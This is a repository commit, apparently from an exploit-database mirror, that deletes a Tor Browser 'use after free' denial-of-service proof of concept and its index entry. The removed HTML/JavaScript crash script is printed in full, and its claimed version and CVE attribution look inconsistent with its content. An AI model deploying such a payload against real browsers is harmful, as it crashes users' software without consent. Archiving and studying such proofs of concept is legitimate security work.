DB: 2019-08-07
2 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC)
This commit is contained in:
parent
d1ba848ff5
commit
fe9103a0fb
2 changed files with 0 additions and 31 deletions
|
@ -1,30 +0,0 @@
|
|||
# Exploit Title: Tor Browser - Use After Free (PoC)
|
||||
# Date: 09.07.2018
|
||||
# Exploit Author: t4rkd3vilz
|
||||
# Vendor Homepage: https://www.torproject.org/
|
||||
# Software Link: https://www.torproject.org/download/download-easy.html.en
|
||||
# Version: Tor 0.3.2.x before 0.3.2.10
|
||||
# Tested on: Kali Linux
|
||||
# CVE : CVE-2018-0491
|
||||
|
||||
#Run exploit, result DOS
|
||||
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<title>veryhandsome jameel naboo</title>
|
||||
<body>
|
||||
<script>
|
||||
function send()
|
||||
{
|
||||
try { document.body.contentEditable = 'true'; } catch(e){}
|
||||
try { var e0 = document.createElement("frameset"); } catch(e){}
|
||||
try { document.body.appendChild(e0); } catch(e){}
|
||||
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
|
||||
try {
|
||||
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
|
||||
rder']='-4400000000';}, false); e0.focus();} catch(e){}
|
||||
try { e0.setAttribute('iframe'); } catch(e){}
|
||||
try { document.body.insertBefore(e0); } catch(e){}
|
||||
}
|
||||
send();</script></html>
|
|
@ -6017,7 +6017,6 @@ id,file,description,date,author,type,platform,port
|
|||
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
|
||||
45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
|
||||
44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
|
||||
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
|
||||
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
|
||||
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
|
||||
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue